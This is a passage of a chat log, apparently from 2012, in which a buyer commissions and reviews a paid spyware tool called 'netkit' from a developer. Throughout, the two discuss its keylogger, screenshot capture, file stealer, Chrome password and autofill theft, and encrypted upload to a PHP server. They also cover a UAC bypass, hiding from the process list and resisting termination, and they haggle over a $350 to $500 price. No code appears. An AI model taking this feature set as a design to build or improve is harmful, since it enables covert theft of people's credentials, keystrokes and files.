  1706. [12/16/2012 8:19:44 PM] ' Tweety HF;: Because nobody will be interested in it, it's suitable only to you.
  1707. [12/16/2012 8:19:48 PM] ' Tweety HF;: And I will delete it after
  1708. [12/16/2012 8:20:21 PM] Shelly Bongo: why nobody will be interested in your eyes? it's a keylogger, they sell a lot of them on HF
  1709. [12/16/2012 8:20:33 PM] Shelly Bongo: i do hope it's a good one too.
  1710. [12/16/2012 8:20:46 PM] ' Tweety HF;: Well it's only the keyboard hook which will sell i guess
  1711. [12/16/2012 8:20:49 PM] Shelly Bongo: otherwise, i might as well have paid $50 to meph to buy his
  1712. [12/16/2012 8:22:45 PM] ' Tweety HF;: It's pretty good, and works really fast. I tried out typing it but didn't succeed so far lol
  1713. [12/16/2012 8:25:10 PM] ' Tweety HF;: Just a minute, removing framework 4 and creating a new host
  1714. [12/16/2012 8:27:46 PM] ' Tweety HF;: what do you mean, "tried out typing it but didn't succeed" ?
  1715. [12/16/2012 8:28:04 PM] Shelly Bongo: what is this
  1716. [12/16/2012 8:28:09 PM] Shelly Bongo: i wrote that
  1717. [12/16/2012 8:28:17 PM] Shelly Bongo: weird bug
  1718. [12/16/2012 8:28:19 PM] Shelly Bongo: anyway
  1719. [12/16/2012 8:28:27 PM] Shelly Bongo: what do you mean that you tried it but didn't succeed?
  1720. [12/16/2012 8:28:34 PM] ' Tweety HF;: I tried to type as fast as i can to see if any keys are lost
  1721. [12/16/2012 8:28:38 PM] ' Tweety HF;: but i failed, no keys were lost
  1722. [12/16/2012 8:28:40 PM] ' Tweety HF;: i couldnt out type it
  1723. [12/16/2012 8:28:52 PM] Shelly Bongo: hmm, i never knew it was a problem for keyloggers
  1724. [12/16/2012 8:29:06 PM] Shelly Bongo: you mean that some keyloggers can be "outtyped" ?
  1725. [12/16/2012 8:29:10 PM] ' Tweety HF;: yup
  1726. [12/16/2012 8:29:18 PM] ' Tweety HF;: i optimized it as much as i can
  1727. [12/16/2012 8:34:04 PM] Shelly Bongo: does it take sqlite db files from browsers?
  1728. [12/16/2012 8:34:05 PM] Shelly Bongo: or no?
  1729. [12/16/2012 8:34:22 PM] ' Tweety HF;: yes
  1730. [12/16/2012 8:34:31 PM] Shelly Bongo: great
  1731. [12/16/2012 8:34:50 PM] Shelly Bongo: and zip files + aes encrypt during transfer?
  1732. [12/16/2012 8:35:08 PM] ' Tweety HF;: Yes
  1733. [12/16/2012 9:03:45 PM] Shelly Bongo: ok
  1734. [12/16/2012 9:04:05 PM] Shelly Bongo: when can you do the TV session with the VM?
  1735. [12/16/2012 9:04:16 PM] Shelly Bongo: i'll want us to do a source code overview
  1736. [12/16/2012 9:04:23 PM] ' Tweety HF;: Sure.
  1737. [12/16/2012 9:04:24 PM] Shelly Bongo: and demo of the tool with diff timers
  1738. [12/16/2012 9:04:27 PM] ' Tweety HF;: Alright.
  1739. [12/16/2012 9:04:35 PM] ' Tweety HF;: Just give me 10 minutes.
  1740. [12/16/2012 9:04:36 PM] Shelly Bongo: can you do it tonight?
  1741. [12/16/2012 9:04:39 PM] ' Tweety HF;: Yes.
  1742. [12/16/2012 9:22:38 PM] Shelly Bongo: you kept it pro with no file dropping right?
  1743. [12/17/2012 12:02:44 AM] Shelly Bongo: ?
  1744. [12/17/2012 12:04:35 AM] Shelly Bongo: In the TV session i'd like to go over:
  1745.  
  1746. [source code review]
  1747.  
  1748. Different timers:
  1749. - keylogger
  1750. - screenshots
  1751. - sysinfo
  1752. - files
  1753. - passwords + sqlite stealers
  1754.  
  1755. Configuration of file stealer - paths and extensions
  1756.  
  1757. In-memory data storage (no files), encrypted transfer
  1758.  
  1759. Server-side PHP
  1760.  
  1761. [ demo ]
  1762. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1763. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1764. - execute netkit
  1765. - show process list, try to kill netkit process
  1766. - go to google and type some strings (to see them in the keylog)
  1767. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1768. [12/17/2012 12:52:51 AM] ' Tweety HF;: Just had dinner, setting up the presentation now
  1769. [12/17/2012 1:16:55 AM] ' Tweety HF;: I'm not going to uninstall NET Framework 4.0
  1770. [12/17/2012 1:17:00 AM] ' Tweety HF;: It takes ages and it comes with the IDE
  1771. [12/17/2012 1:17:14 AM] ' Tweety HF;: The target Framework is 2.0 and so is all the reference which I will show
  1772. [12/17/2012 2:57:42 AM] ' Tweety HF;: I havn't heard from you for a while..
  1773. [12/17/2012 2:59:50 AM] ' Tweety HF;: I need to go soon...
  1774. [12/17/2012 3:00:06 AM] ' Tweety HF;: Common, can you respond?
  1775. [12/17/2012 3:10:19 AM] ' Tweety HF;: Common..
  1776. [12/17/2012 3:19:00 AM] ' Tweety HF;: Dude seriously..
  1777. [12/17/2012 3:23:55 AM] ' Tweety HF;: I need to go offline
  1778. [12/17/2012 3:24:01 AM] Shelly Bongo: hi
  1779. [12/17/2012 3:24:05 AM] ' Tweety HF;: Damn
  1780. [12/17/2012 3:24:06 AM] ' Tweety HF;: gah
  1781. [12/17/2012 3:24:09 AM] ' Tweety HF;: AHH
  1782. [12/17/2012 3:24:13 AM] Shelly Bongo: pardon?
  1783. [12/17/2012 3:24:13 AM] ' Tweety HF;: i need sleep
  1784. [12/17/2012 3:24:19 AM] Shelly Bongo: we can do this tomorrow
  1785. [12/17/2012 3:24:24 AM] ' Tweety HF;: No
  1786. [12/17/2012 3:24:25 AM] ' Tweety HF;: now is fine
  1787. [12/17/2012 3:24:35 AM] ' Tweety HF;: I held you up too long
  1788. [12/17/2012 3:24:41 AM] Shelly Bongo: i won't argue with that
  1789. [12/17/2012 3:24:53 AM] ' Tweety HF;: https://secure.join.me/457-368-651
  1790. [12/17/2012 3:24:59 AM] Shelly Bongo: is everything ready now?
  1791. [12/17/2012 3:25:20 AM] ' Tweety HF;: Yes
  1792. [12/17/2012 3:25:59 AM] ' Tweety HF;: So i'll run it and show you how it works
  1793. [12/17/2012 3:26:00 AM] Shelly Bongo: sec
  1794. [12/17/2012 3:26:04 AM] Shelly Bongo: wait a min
  1795. [12/17/2012 3:26:05 AM] ' Tweety HF;: ok
  1796. [12/17/2012 3:26:07 AM] Shelly Bongo: i need to resize screen
  1797. [12/17/2012 3:26:09 AM] Shelly Bongo: don't see well
  1798. [12/17/2012 3:26:57 AM] Shelly Bongo: In the TV session i'd like to go over:
  1799.  
  1800. [source code review]
  1801.  
  1802. Different timers:
  1803. - keylogger
  1804. - screenshots
  1805. - sysinfo
  1806. - files
  1807. - passwords + sqlite stealers
  1808.  
  1809. Configuration of file stealer - paths and extensions
  1810.  
  1811. In-memory data storage (no files), encrypted transfer
  1812.  
  1813. Server-side PHP
  1814.  
  1815. [ demo ]
  1816. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1817. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1818. - execute netkit
  1819. - show process list, try to kill netkit process
  1820. - go to google and type some strings (to see them in the keylog)
  1821. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1822. [12/17/2012 3:26:59 AM] Shelly Bongo: okay
  1823. [12/17/2012 3:27:34 AM] Shelly Bongo: sec
  1824. [12/17/2012 3:27:44 AM] Shelly Bongo: you're dropping files?
  1825. [12/17/2012 3:27:46 AM] Shelly Bongo: updates.dll
  1826. [12/17/2012 3:27:52 AM] Shelly Bongo: zip files in \system\
  1827. [12/17/2012 3:27:54 AM] Shelly Bongo: etc
  1828. [12/17/2012 3:28:10 AM] ' Tweety HF;: Yeah
  1829. [12/17/2012 3:28:14 AM] ' Tweety HF;: We discussed that already
  1830. [12/17/2012 3:28:24 AM] ' Tweety HF;: either we write to EOF or we leave a dictionary
  1831. [12/17/2012 3:28:25 AM] Shelly Bongo: we discussed that all files would be in memory
  1832. [12/17/2012 3:28:34 AM] ' Tweety HF;: Don't you remember our discussion?
  1833. [12/17/2012 3:28:57 AM] Shelly Bongo: we said we'll write to EOF
  1834. [12/17/2012 3:29:13 AM] ' Tweety HF;: But remember what happend to writing in EOF on text files?
  1835. [12/17/2012 3:29:17 AM] ' Tweety HF;: It's visible.
  1836. [12/17/2012 3:29:26 AM] Shelly Bongo: okay, so what do you do instead?
  1837. [12/17/2012 3:29:29 AM] ' Tweety HF;: Don't worry, this all uses a UAC bypass
  1838. [12/17/2012 3:29:37 AM] ' Tweety HF;: it just drops the file and uploads it
  1839. [12/17/2012 3:29:45 AM] Shelly Bongo: lets get back to the source
  1840. [12/17/2012 3:29:49 AM] Shelly Bongo: can you please follow my lit?
  1841. [12/17/2012 3:29:50 AM] Shelly Bongo: list
  1842. [12/17/2012 3:29:54 AM] Shelly Bongo: show me all the timers first
  1843. [12/17/2012 3:30:17 AM] ' Tweety HF;: I put the screenshot + file transfers in one timer
  1844. [12/17/2012 3:30:23 AM] ' Tweety HF;: do you want me to seperate it?
  1845. [12/17/2012 3:30:26 AM] Shelly Bongo: yes
  1846. [12/17/2012 3:30:29 AM] Shelly Bongo: i asked all to be separate
  1847. [12/17/2012 3:31:23 AM] ' Tweety HF;: Done
  1848. [12/17/2012 3:31:29 AM] Shelly Bongo: okay
  1849. [12/17/2012 3:31:32 AM] ' Tweety HF;: Want me to show it working?
  1850. [12/17/2012 3:31:37 AM] Shelly Bongo: no wait
  1851. [12/17/2012 3:31:41 AM] ' Tweety HF;: ok
  1852. [12/17/2012 3:31:46 AM] Shelly Bongo: about the file timer
  1853. [12/17/2012 3:31:54 AM] Shelly Bongo: from my feature description:
  1854. [12/17/2012 3:32:00 AM | Removed 3:32:07 AM] Shelly Bongo: This message has been removed.
  1855. [12/17/2012 3:32:18 AM] Shelly Bongo: it should also trigger when computer is idle
  1856. [12/17/2012 3:32:27 AM] Shelly Bongo: is it done?
  1857. [12/17/2012 3:32:48 AM] ' Tweety HF;: It checks the idle count
  1858. [12/17/2012 3:32:54 AM] ' Tweety HF;: I put it as if idle for 5 minues
  1859. [12/17/2012 3:33:00 AM] ' Tweety HF;: if thats too much i can lower it
  1860. [12/17/2012 3:33:32 AM] Shelly Bongo: "- sends out files whenever the computer is idle, and regardless to that - whenever FILER_SENDOUT_INTERVAL is reached"
  1861. [12/17/2012 3:33:38 AM] Shelly Bongo: it should be unrealted
  1862. [12/17/2012 3:33:41 AM] Shelly Bongo: unrelated
  1863. [12/17/2012 3:33:46 AM] Shelly Bongo: 1) every X minutes
  1864. [12/17/2012 3:33:52 AM] Shelly Bongo: 2) every time computer is idle
  1865. [12/17/2012 3:33:59 AM] Shelly Bongo: two separate conditions trigger the transfer
  1866. [12/17/2012 3:34:02 AM] ' Tweety HF;: Yes
  1867. [12/17/2012 3:34:18 AM] Shelly Bongo: is this how it works now?
  1868. [12/17/2012 3:34:18 AM] ' Tweety HF;: i have the timer interval and the send.Count
  1869. [12/17/2012 3:34:49 AM] Shelly Bongo: sorry, i have to leave
  1870. [12/17/2012 3:34:54 AM] ' Tweety HF;: damn it
  1871. [12/17/2012 3:34:55 AM] Shelly Bongo: i'll be here tomorrow
  1872. [12/17/2012 3:34:59 AM] ' Tweety HF;: What time
  1873. [12/17/2012 3:35:02 AM] Shelly Bongo: we can finish then
  1874. [12/17/2012 3:35:03 AM] ' Tweety HF;: 4.30 PM GMT
  1875. [12/17/2012 3:35:03 AM] ' Tweety HF;: Alright
  1876. [12/17/2012 3:35:10 AM] ' Tweety HF;: cya
  1877. [12/17/2012 3:35:49 AM] Shelly Bongo: i will probably be here sooner
  1878. [12/17/2012 3:35:56 AM] ' Tweety HF;: Ok
  1879. [12/17/2012 6:18:11 PM] ' Tweety HF;: Hi
  1880. [12/17/2012 7:09:53 PM] ' Tweety HF;: ???
  1881. [12/17/2012 11:54:14 PM] ' Tweety HF;: Are you bailing..?
  1882. [12/18/2012 2:22:58 AM] Shelly Bongo: hi
  1883. [12/18/2012 2:22:59 AM] Shelly Bongo: no
  1884. [12/18/2012 2:23:04 AM] Shelly Bongo: i want it
  1885. [12/18/2012 2:23:06 AM] ' Tweety HF;: ok
  1886. [12/18/2012 2:23:09 AM] ' Tweety HF;: presentation?
  1887. [12/18/2012 2:23:09 AM] Shelly Bongo: i have some urgent thing going on
  1888. [12/18/2012 2:23:15 AM] ' Tweety HF;: alright
  1889. [12/18/2012 2:23:26 AM] Shelly Bongo: yesterday i also understood that some things are already missing
  1890. [12/18/2012 2:24:17 AM] Shelly Bongo: anyway i want to do the presentation, to go over the subject i wrote to you yesterday
  1891. [12/18/2012 2:24:56 AM] Shelly Bongo: so bare with me, i'll try to be available in 2-3 hours, or tomorrow
  1892. [12/18/2012 2:25:06 AM] ' Tweety HF;: its almost 1am
  1893. [12/18/2012 2:25:12 AM] ' Tweety HF;: i will be gone in an hour
  1894. [12/18/2012 2:25:24 AM] Shelly Bongo: then it'll have to happen tomorrow
  1895. [12/18/2012 2:25:43 AM] ' Tweety HF;: alright
  1896. [12/18/2012 2:25:48 AM] ' Tweety HF;: and how much is th final payment
  1897. [12/18/2012 2:26:11 AM] Shelly Bongo: 200 usd, totalling in 350.
  1898. [12/18/2012 2:26:23 AM] ' Tweety HF;: meh
  1899. [12/18/2012 2:26:40 AM] Shelly Bongo: if you're not interested, i'll find someone else who is.
  1900. [12/18/2012 2:26:52 AM] Shelly Bongo: i would LOVE to pay the full 500
  1901. [12/18/2012 2:27:17 AM] Shelly Bongo: but you have cause me much problems with the delays (now i'm paying for this myself, before it was related to a project)
  1902. [12/18/2012 2:27:46 AM] ' Tweety HF;: It's been 2 days delay and other 2 days you was not online when i was
  1903. [12/18/2012 2:28:05 AM] Shelly Bongo: it was 2 days too long for the project, another contractor was hired, i lost a job
  1904. [12/18/2012 2:28:11 AM] Shelly Bongo: very simple
  1905. [12/18/2012 2:28:21 AM] Shelly Bongo: also some of the stealers are missing ("impossible to develop" blabla)
  1906. [12/18/2012 2:28:38 AM] Shelly Bongo: if you do a good job with teh file stealer, i can bump it to 400 usd total
  1907. [12/18/2012 2:28:49 AM] Shelly Bongo: the file stealer is an important feature to me
  1908. [12/18/2012 2:29:01 AM] ' Tweety HF;: File stealer is working perfectly. I can demonstrate.
  1909. [12/18/2012 2:29:15 AM] Shelly Bongo: yes but is it up to the spec i sent you? did you read and check?
  1910. [12/18/2012 2:29:39 AM] ' Tweety HF;: Yes
  1911. [12/18/2012 2:29:39 AM] Shelly Bongo: yesterday i understood that the answer is 'no'
  1912. [12/18/2012 2:29:49 AM] ' Tweety HF;: It does everything required
  1913. [12/18/2012 2:30:05 AM] ' Tweety HF;: Yes
  1914. [12/18/2012 2:30:10 AM] Shelly Bongo: ok then, i'll see it tomorrow
  1915. [12/18/2012 2:30:14 AM] ' Tweety HF;: ok
  1916. [12/18/2012 2:30:16 AM] Shelly Bongo: i have another project now
  1917. [12/18/2012 2:30:21 AM] ' Tweety HF;: ok
  1918. [12/18/2012 7:08:13 PM] ' Tweety HF;: Are you online..
  1919. [12/18/2012 7:12:49 PM] Shelly Bongo: i was all day long when you weren't
  1920. [12/18/2012 7:12:59 PM] ' Tweety HF;: I have college..
  1921. [12/18/2012 7:13:00 PM] ' Tweety HF;: And work..
  1922. [12/18/2012 7:13:04 PM] Shelly Bongo: i'll be here as of 10PM your time
  1923. [12/18/2012 7:13:08 PM] ' Tweety HF;: ok
  1924. [12/18/2012 7:13:15 PM] Shelly Bongo: by "your time" i mean GMT
  1925. [12/18/2012 7:13:24 PM] ' Tweety HF;: alright
  1926. [12/19/2012 8:10:17 PM] Shelly Bongo: hi
  1927. [12/19/2012 8:10:35 PM] ' Tweety HF;: hi
  1928. [12/19/2012 8:11:03 PM] Shelly Bongo: can you do the TV demo now?
  1929. [12/19/2012 8:11:47 PM] ' Tweety HF;: https://secure.join.me/588-008-209
  1930. [12/19/2012 8:12:37 PM] Shelly Bongo: In the TV session i'd like to go over:
  1931.  
  1932. [source code review]
  1933.  
  1934. Different timers:
  1935. - keylogger
  1936. - screenshots
  1937. - sysinfo
  1938. - files
  1939. - passwords + sqlite stealers
  1940.  
  1941. Configuration of file stealer - paths and extensions
  1942.  
  1943. In-memory data storage (no files), encrypted transfer
  1944.  
  1945. Server-side PHP
  1946.  
  1947. [ demo ]
  1948. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  1949. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  1950. - execute netkit
  1951. - show process list, try to kill netkit process
  1952. - go to google and type some strings (to see them in the keylog)
  1953. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  1954. [12/19/2012 8:14:31 PM] ' Tweety HF;: watching?
  1955. [12/19/2012 8:14:38 PM] Shelly Bongo: yes
  1956. [12/19/2012 8:15:17 PM] ' Tweety HF;: im turning off the idle command
  1957. [12/19/2012 8:15:20 PM] ' Tweety HF;: just for now
  1958. [12/19/2012 8:15:37 PM] Shelly Bongo: we said it needs to work whenever the computer is idle
  1959. [12/19/2012 8:15:47 PM] Shelly Bongo: OR when every interval that is setup
  1960. [12/19/2012 8:15:49 PM] ' Tweety HF;: i know
  1961. [12/19/2012 8:15:50 PM] Shelly Bongo: not both
  1962. [12/19/2012 8:16:01 PM] Shelly Bongo: meaning, every X minutes it starts
  1963. [12/19/2012 8:16:07 PM] ' Tweety HF;: Yeah i got it
  1964. [12/19/2012 8:16:08 PM] Shelly Bongo: and also - everytime the computer is idle
  1965. [12/19/2012 8:16:16 PM] ' Tweety HF;: but im turning the idle thing off for now
  1966. [12/19/2012 8:16:19 PM] ' Tweety HF;: to demonstrate
  1967. [12/19/2012 8:16:23 PM] ' Tweety HF;: btw
  1968. [12/19/2012 8:16:27 PM] ' Tweety HF;: everything is in milliseconds
  1969. [12/19/2012 8:16:56 PM] ' Tweety HF;: oh, we need a few fake files
  1970. [12/19/2012 8:17:04 PM] ' Tweety HF;: because i dont have the file extensions in the given location
  1971. [12/19/2012 8:17:57 PM] ' Tweety HF;: we cant use the microsoft webrequest
  1972. [12/19/2012 8:18:02 PM] ' Tweety HF;: on the update page
  1973. [12/19/2012 8:18:03 PM] ' Tweety HF;: they blocked my ip lol
  1974. [12/19/2012 8:18:07 PM] ' Tweety HF;: but it works
  1975. [12/19/2012 8:18:20 PM] Shelly Bongo: why does it throw an exception?
  1976. [12/19/2012 8:18:24 PM] Shelly Bongo: it shouldn't - even if it doesn't work
  1977. [12/19/2012 8:18:30 PM] ' Tweety HF;: i know
  1978. [12/19/2012 8:18:36 PM] ' Tweety HF;: its because its in debugger mode.
  1979. [12/19/2012 8:19:46 PM] Shelly Bongo: what is that dll?
  1980. [12/19/2012 8:19:48 PM] Shelly Bongo: zip
  1981. [12/19/2012 8:20:09 PM] Shelly Bongo: netkit doesn't require it to be copied with it to a target in order to run, correct?
  1982. [12/19/2012 8:20:22 PM] ' Tweety HF;: nope
  1983. [12/19/2012 8:20:26 PM] ' Tweety HF;: it runs from resources
  1984. [12/19/2012 8:20:57 PM] Shelly Bongo: what's the interval?
  1985. [12/19/2012 8:20:59 PM] Shelly Bongo: for the files
  1986. [12/19/2012 8:21:07 PM] ' Tweety HF;: 300000
  1987. [12/19/2012 8:21:22 PM] Shelly Bongo: 5 mins?
  1988. [12/19/2012 8:21:39 PM] ' Tweety HF;: 600000
  1989. [12/19/2012 8:21:53 PM] Shelly Bongo: why didn't sysinfo send itself?
  1990. [12/19/2012 8:22:10 PM] ' Tweety HF;: sec
  1991. [12/19/2012 8:22:24 PM] Shelly Bongo: sysinfo() should send itself after it runs
  1992. [12/19/2012 8:22:30 PM] Shelly Bongo: and then wait for its interval
  1993. [12/19/2012 8:22:36 PM] ' Tweety HF;: i know
  1994. [12/19/2012 8:22:37 PM] ' Tweety HF;: hold on
  1995. [12/19/2012 8:23:54 PM] Shelly Bongo: why are you dropping files?
  1996. [12/19/2012 8:23:58 PM] Shelly Bongo: and not store memory straem
  1997. [12/19/2012 8:24:19 PM] ' Tweety HF;: we had that discussion already
  1998. [12/19/2012 8:24:52 PM] Shelly Bongo: we said you'll store info about files that were sent either in eof, or in a file
  1999. [12/19/2012 8:25:14 PM] Shelly Bongo: but we said we WILL NOT STORE FILES/SCREENSHOTS/LOGS
  2000. [12/19/2012 8:25:16 PM] Shelly Bongo: in files
  2001. [12/19/2012 8:25:19 PM] ' Tweety HF;: yeah and that didnt work
  2002. [12/19/2012 8:25:19 PM] Shelly Bongo: so wtf is this
  2003. [12/19/2012 8:25:31 PM] ' Tweety HF;: you cant zip in memory
  2004. [12/19/2012 8:25:35 PM] Shelly Bongo: yes you can
  2005. [12/19/2012 8:25:35 PM] ' Tweety HF;: its not possible
  2006. [12/19/2012 8:25:41 PM] Shelly Bongo: it's possible, perhaps you can't
  2007. [12/19/2012 8:25:41 PM] ' Tweety HF;: and this is a UAC bypassed zone
  2008. [12/19/2012 8:25:43 PM] Shelly Bongo: but it's possible
  2009. [12/19/2012 8:26:07 PM] Shelly Bongo: okay
  2010. [12/19/2012 8:26:09 PM] Shelly Bongo: show me the rest
  2011. [12/19/2012 8:26:20 PM] Shelly Bongo: show me the files from: - keylogger
  2012. - screenshots
  2013. - sysinfo
  2014. - files
  2015. - passwords + sqlite stealers
  2016. [12/19/2012 8:26:25 PM] ' Tweety HF;: i will sec
  2017. [12/19/2012 8:29:32 PM] Shelly Bongo: you didn't even bother testing this before? it seems like basically functionality isn't working
  2018. [12/19/2012 8:29:44 PM] Shelly Bongo: and now i need to watch you fix basic things
  2019. [12/19/2012 8:30:35 PM] Shelly Bongo: i'm disconnecting
  2020. [12/19/2012 8:30:37 PM] Shelly Bongo: this is absurd
  2021. [12/19/2012 8:30:49 PM] ' Tweety HF;: i did.
  2022. [12/19/2012 8:30:55 PM] Shelly Bongo: [Wednesday, December 19, 2012 8:12 PM] Shelly Bongo:
  2023.  
  2024. <<< [source code review]
  2025.  
  2026. Different timers:
  2027. - keylogger
  2028. - screenshots
  2029. - sysinfo
  2030. - files
  2031. - passwords + sqlite stealers
  2032.  
  2033. Configuration of file stealer - paths and extensions
  2034.  
  2035. In-memory data storage (no files), encrypted transfer
  2036.  
  2037. Server-side PHP
  2038.  
  2039. [ demo ]
  2040. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  2041. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  2042. - execute netkit
  2043. - show process list, try to kill netkit process
  2044. - go to google and type some strings (to see them in the keylog)
  2045. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  2046. [12/19/2012 8:31:01 PM] Shelly Bongo: ^^ TEST THAT IT WORKS
  2047. [12/19/2012 8:31:03 PM] Shelly Bongo: then talk to me
  2048. [12/19/2012 8:31:16 PM] ' Tweety HF;: it does work.
  2049. [12/19/2012 8:31:20 PM] ' Tweety HF;: i already tested it.
  2050. [12/19/2012 8:31:21 PM] Shelly Bongo: i can see it doesn't
  2051. [12/19/2012 8:31:29 PM] Shelly Bongo: then why am i watching you fix code?
  2052. [12/19/2012 8:31:35 PM] Shelly Bongo: because it doesn't work.
  2053. [12/19/2012 8:31:37 PM] ' Tweety HF;: the encryption was being weird.
  2054. [12/19/2012 8:31:43 PM] ' Tweety HF;: but, its fixed now.
  2055. [12/19/2012 8:32:02 PM] Shelly Bongo: listen
  2056. [12/19/2012 8:32:12 PM] Shelly Bongo: show me everything AT THE FLOW SPECIFIED in the text i pasted
  2057. [12/19/2012 8:32:15 PM] Shelly Bongo: start from [demo]
  2058. [12/19/2012 8:32:22 PM] Shelly Bongo: can you do that?
  2059. [12/19/2012 8:32:29 PM] Shelly Bongo: then [source code review]
  2060. [12/19/2012 8:32:41 PM] ' Tweety HF;: alright 1 sec then
  2061. [12/19/2012 8:32:43 PM] Shelly Bongo: ok.
  2062. [12/19/2012 8:36:03 PM] ' Tweety HF;: fixed it
  2063. [12/19/2012 8:36:11 PM] ' Tweety HF;: the encryption wasnt picking up the array locations
  2064. [12/19/2012 8:36:51 PM] ' Tweety HF;: https://secure.join.me/588-008-209
  2065. [12/19/2012 8:38:52 PM] ' Tweety HF;: watching?
  2066. [12/19/2012 8:39:00 PM] Shelly Bongo: sec
  2067. [12/19/2012 8:39:30 PM] Shelly Bongo: watching
  2068. [12/19/2012 8:39:46 PM] Shelly Bongo: STOP
  2069. [12/19/2012 8:39:50 PM] Shelly Bongo: you are not following my request
  2070. [12/19/2012 8:39:51 PM] ' Tweety HF;: ?
  2071. [12/19/2012 8:39:59 PM] Shelly Bongo: [Wednesday, December 19, 2012 8:30 PM] Shelly Bongo:
  2072.  
  2073. <<< [ demo ]
  2074. - Show a win7 VM with no .Net 4 installed (vanilla Win7, with .net 2)
  2075. - store some fake passwords into chrome (to see in the pass stealer log), and some address in the chrome autofill (for the sqlite stealer)
  2076. - execute netkit
  2077. - show process list, try to kill netkit process
  2078. - go to google and type some strings (to see them in the keylog)
  2079. - validate all different timers triggered twice to see everything works by inspecting delivered logs/screenshots/files/passwords
  2080. [12/19/2012 8:40:03 PM] Shelly Bongo: ...
  2081. [12/19/2012 8:40:05 PM] Shelly Bongo: start from the top
  2082. [12/19/2012 8:40:07 PM] Shelly Bongo: read & show
  2083. [12/19/2012 8:40:08 PM] ' Tweety HF;: it dont need framework 4
  2084. [12/19/2012 8:40:11 PM] Shelly Bongo: show me.
  2085. [12/19/2012 8:40:12 PM] ' Tweety HF;: look?
  2086. [12/19/2012 8:40:48 PM] Shelly Bongo: ok
  2087. [12/19/2012 8:40:51 PM] Shelly Bongo: now store some passwords
  2088. [12/19/2012 8:40:53 PM] ' Tweety HF;: it targets 2.0
  2089. [12/19/2012 8:40:58 PM] Shelly Bongo: and autofill in chrome
  2090. [12/19/2012 8:42:07 PM] ' Tweety HF;: thats how it upload
  2091. [12/19/2012 8:42:22 PM] ' Tweety HF;: system info
  2092. [12/19/2012 8:42:47 PM] ' Tweety HF;: screenshot, files, sys info
  2093. [12/19/2012 8:42:48 PM] ' Tweety HF;: keyloggs
  2094. [12/19/2012 8:42:50 PM] ' Tweety HF;: etc
  2095. [12/19/2012 8:43:49 PM] ' Tweety HF;: key strokes here..
  2096. [12/19/2012 8:44:28 PM] Shelly Bongo: what's updates.dll
  2097. [12/19/2012 8:44:54 PM] ' Tweety HF;: its to store the hash
  2098. [12/19/2012 8:45:07 PM] ' Tweety HF;: screenshot
  2099. [12/19/2012 8:45:18 PM] Shelly Bongo: show it again
  2100. [12/19/2012 8:45:30 PM] Shelly Bongo: ok
  2101. [12/19/2012 8:45:56 PM] Shelly Bongo: show me sysinfo + fils
  2102. [12/19/2012 8:47:43 PM] Shelly Bongo: hello?
  2103. [12/19/2012 8:47:50 PM] ' Tweety HF;: yeah sec
  2104. [12/19/2012 8:47:56 PM] ' Tweety HF;: my computers a bit queer
  2105. [12/19/2012 8:48:29 PM] ' Tweety HF;: this is sys logs
  2106. [12/19/2012 8:48:36 PM] Shelly Bongo: where are the passwords?
  2107. [12/19/2012 8:48:40 PM] Shelly Bongo: and sqlite files
  2108. [12/19/2012 8:48:53 PM] ' Tweety HF;: sec
  2109. [12/19/2012 8:49:52 PM] ' Tweety HF;: forgot to add it into the cycle
  2110. [12/19/2012 8:49:53 PM] ' Tweety HF;: sec lol
  2111. [12/19/2012 8:49:58 PM] Shelly Bongo: to add what?
  2112. [12/19/2012 8:50:03 PM] Shelly Bongo: passwords or sqlite?
  2113. [12/19/2012 8:50:15 PM] ' Tweety HF;: sqlite
  2114. [12/19/2012 8:50:17 PM] ' Tweety HF;: i wrote it in
  2115. [12/19/2012 8:50:21 PM] ' Tweety HF;: i forgot to add it into the list
  2116. [12/19/2012 8:52:28 PM] ' Tweety HF;: yeah it adds them in
  2117. [12/19/2012 8:52:34 PM] ' Tweety HF;: but my chromes weird
  2118. [12/19/2012 8:53:42 PM] Shelly Bongo: so once again..
  2119. [12/19/2012 8:53:47 PM] Shelly Bongo: please stop wasting my time
  2120. [12/19/2012 8:53:49 PM] ' Tweety HF;: no lol
  2121. [12/19/2012 8:53:50 PM] ' Tweety HF;: it works
  2122. [12/19/2012 8:53:50 PM] Shelly Bongo: TEST EVERYTHING
  2123. [12/19/2012 8:53:53 PM] Shelly Bongo: and talk to me
  2124. [12/19/2012 8:53:55 PM] ' Tweety HF;: but its my chrome
  2125. [12/19/2012 8:53:57 PM] ' Tweety HF;: its all tested..
  2126. [12/19/2012 8:54:14 PM] Shelly Bongo: show me how it behaves
  2127. [12/19/2012 8:54:18 PM] Shelly Bongo: if you try to kill the process
  2128. [12/19/2012 8:54:23 PM] Shelly Bongo: you said it'll say it's not allowed
  2129. [12/19/2012 8:55:00 PM] ' Tweety HF;: i changed it
  2130. [12/19/2012 8:55:05 PM] ' Tweety HF;: so it dont show on process list anymore
  2131. [12/19/2012 8:55:13 PM] Shelly Bongo: but it does, i saw netkit just now
  2132. [12/19/2012 8:55:15 PM] ' Tweety HF;: netkit.vhost.exe
  2133. [12/19/2012 8:55:19 PM] ' Tweety HF;: thats visual studios
  2134. [12/19/2012 8:55:27 PM] ' Tweety HF;: the file names just netkit.exe
  2135. [12/19/2012 8:55:39 PM] Shelly Bongo: ok, so now it doesn't show at all?
  2136. [12/19/2012 8:55:42 PM] ' Tweety HF;: the clr wont let me end
  2137. [12/19/2012 8:55:44 PM] ' Tweety HF;: nope
  2138. [12/19/2012 8:55:50 PM] Shelly Bongo: what if a non-admin user installs netkit?
  2139. [12/19/2012 8:55:50 PM] ' Tweety HF;: look
  2140. [12/19/2012 8:55:53 PM] ' Tweety HF;: oh
  2141. [12/19/2012 8:55:57 PM] ' Tweety HF;: then it will still not show up
  2142. [12/19/2012 8:56:03 PM] ' Tweety HF;: its using a different method
